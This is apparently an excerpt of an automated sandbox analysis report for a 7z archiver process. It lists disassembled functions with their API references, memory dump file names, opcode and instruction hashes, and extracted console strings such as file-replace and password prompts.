                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73E05A68741A0691EA04EBD1F8A839423B2F74A751F804025C54A22220AF7B826ACB67
                                                                                                                                                                                                                                                                            Function 00664F24 Relevance: 11.4, APIs: 9, Instructions: 111COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                                                                                            • Instruction ID: 452dd1d04f1fb5a235441e008baf7ba74e6c10a0c1f66592f542c05493530641
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31B872718E8182DB50DE26D89116DB712AB97FE4F085225FFAE1B799CF29C4028744
                                                                                                                                                                                                                                                                            Function 00680554 Relevance: 11.4, APIs: 9, Instructions: 100COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 408039514-0
                                                                                                                                                                                                                                                                            • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                                                                                            • Instruction ID: b2bc66c8b179cf526fe98ab85b7c9ab1024dfa964a7431db7f64b093357ae010
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA31C37331898087CBB0EF25E89025AB761F7C6794F440625EB8E83B65DF39D899CB04
                                                                                                                                                                                                                                                                            Function 0069EAD4 Relevance: 11.3, APIs: 9, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                            • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                                                                                            • Instruction ID: facb14074d4fe0b61bc54770d38134bd8b27b794786760e4bd762732cf390e13
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 943141E1308B5191EF04EF2ADA513A4332B9746FD4F845055EE0697B09EF7ACE96C344
                                                                                                                                                                                                                                                                            Function 006929F7 Relevance: 11.3, APIs: 9, Instructions: 52COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                                                                                            • Instruction ID: 0095f062a02ea9a39b43ad7659f08181d60defcd2ed2d40d6b0231376be157d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F601DAB325A99145CB51FB22E4A266EA712E7C3B91F0510A69F4E63755CE38C447C608
                                                                                                                                                                                                                                                                            Function 00693677 Relevance: 11.3, APIs: 9, Instructions: 48COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                                                                                            • Instruction ID: db183bedc58a7fe013a3c058966dfed6d9a8bdf91ef3a9bccda9d25f2126e08c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0901BBB225A99145CB51FF36E46166E9312E7C7B91F0110659F4E63751CE38C447C608
                                                                                                                                                                                                                                                                            Function 006A68FC Relevance: 11.3, APIs: 9, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                                                                                            • Instruction ID: 35b91d583c2d894ea1b97272edb3dcaa51f693a004e3c35e420de7cdfded3919
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52011AB3715D8289CB50FE36DCA11A8A322EB87B987184175BF1D5B795DE20CC528348
                                                                                                                                                                                                                                                                            Function 0066F0C8 Relevance: 11.3, APIs: 9, Instructions: 44COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                                                            • Instruction ID: 41be85f9acd132793fef9ce8ce25c0cce23e52f962f2c959132e2a62a5a1a64f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 140121B3715D818ACB50FF36DCA11ACB721EB87B98B184175BF1D5B795DE60C8428348
                                                                                                                                                                                                                                                                            Function 006AC844 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AC91C
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AC9F1
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 0066237E
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: fputs.MSVCRT ref: 006623B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 006623C4
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ACADA
                                                                                                                                                                                                                                                                              • Part of subcall function 006622E4: fflush.MSVCRT ref: 006622EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free$fflushfputcmemset
                                                                                                                                                                                                                                                                            • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                                                            • API String ID: 2975459029-4064182643
                                                                                                                                                                                                                                                                            • Opcode ID: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                                                                                                                                                            • Instruction ID: f439156562614fe5cdcf6e65666affea20cc018bce895f8fa085f5b0cc3f1c34
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A614E667009869ACA78FF72E4A13BE7713F742B90F48402ADB5B17702DF28DC948B54
                                                                                                                                                                                                                                                                            Function 00695680 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 181COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: : $...$Junction: $REPARSE:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-1476144188
                                                                                                                                                                                                                                                                            • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                                                            • Instruction ID: 14e0f83b833079c0b8dce40ee53e8e83cef02ee2f4038f0b232f05735da0338b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C514872310A4092DF50DF21E8513AA776BFB817A4F849026EE878BB94DF7CC685CB54
                                                                                                                                                                                                                                                                            Function 006A0E6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 006A0E9C
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: free.MSVCRT ref: 006633D7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: memmove.MSVCRT(00000000,?,?,00000000,006610A8), ref: 006633F2
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A0F5D
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A0FD8
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A0FF4
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 006A1092
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                                                                                                                                                                                                                            • String ID: ???
                                                                                                                                                                                                                                                                            • API String ID: 2578255354-1053719742
                                                                                                                                                                                                                                                                            • Opcode ID: 00556c404eac33c9a52bd7bb8a653997888a1c921732fb09df82643b0d7878c8
                                                                                                                                                                                                                                                                            • Instruction ID: c88b68b6cc5e2175fade34696a56b036aa7d005804bb9265298cee9ac55598ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00556c404eac33c9a52bd7bb8a653997888a1c921732fb09df82643b0d7878c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27518D72300A81A6EB58EB21DA903ED7322F746B94F444126DF2D57760DF39E9BAC700
                                                                                                                                                                                                                                                                            Function 006A0C64 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • with the file from archive:, xrefs: 006A0D1C
                                                                                                                                                                                                                                                                            • Would you like to replace the existing file:, xrefs: 006A0CF0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                                                                                                                                                                            • API String ID: 3346953513-686978020
                                                                                                                                                                                                                                                                            • Opcode ID: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                                                                                                                                                            • Instruction ID: cd7f5fe23ed07be975b484cc1a3ad1056c33729e905cfd8a38c61ad532885909
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2741B36334068291EB68BF65D8903E87362FB87B90F4485229F6D07751CF38DC99DB05
                                                                                                                                                                                                                                                                            Function 006A12B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSectionfputs$EnterLeavefree
                                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                                            • API String ID: 1989314732-3653984579
                                                                                                                                                                                                                                                                            • Opcode ID: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                                                                                                                                                            • Instruction ID: 9fd570b8772686088c85c87cb650ce4d148847f14d08601ff9fdc40b8e1b96b9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81315E72200A8181DB51EF25D8903ED3362F78AFA8F485236DE5D5B7A8CF78C885C714
                                                                                                                                                                                                                                                                            Function 006ACE50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Enter password (will not be echoed):, xrefs: 006ACE69
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConsoleMode$Handlefflushfputs
                                                                                                                                                                                                                                                                            • String ID: Enter password (will not be echoed):
                                                                                                                                                                                                                                                                            • API String ID: 108775803-3720017889
                                                                                                                                                                                                                                                                            • Opcode ID: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                                                                                                                                                                                                                            • Instruction ID: bca47948f49048323bf8fe4e13ae5948304866de9675bb63e503429a675b26d6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4212C2230564146EF14BB65AE203796363AF4A7B0F184224EE2B473E4DF7CCC95CB41
                                                                                                                                                                                                                                                                            Function 006A1AA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputsfree
                                                                                                                                                                                                                                                                            • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                                                                                                                                                                                                                                                            • API String ID: 2581285248-3393983761
                                                                                                                                                                                                                                                                            • Opcode ID: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                                                                                                                                                                                                                            • Instruction ID: 092cc05e3168738cbd0e54257766a17e97008866395f3c956898225949cece60
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D92198A230094595CF60EF25E8503AD7726F7CABE4F444226EF1E97365EF28CA56C710
                                                                                                                                                                                                                                                                            Function 00697614 Relevance: 10.2, APIs: 8, Instructions: 196COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
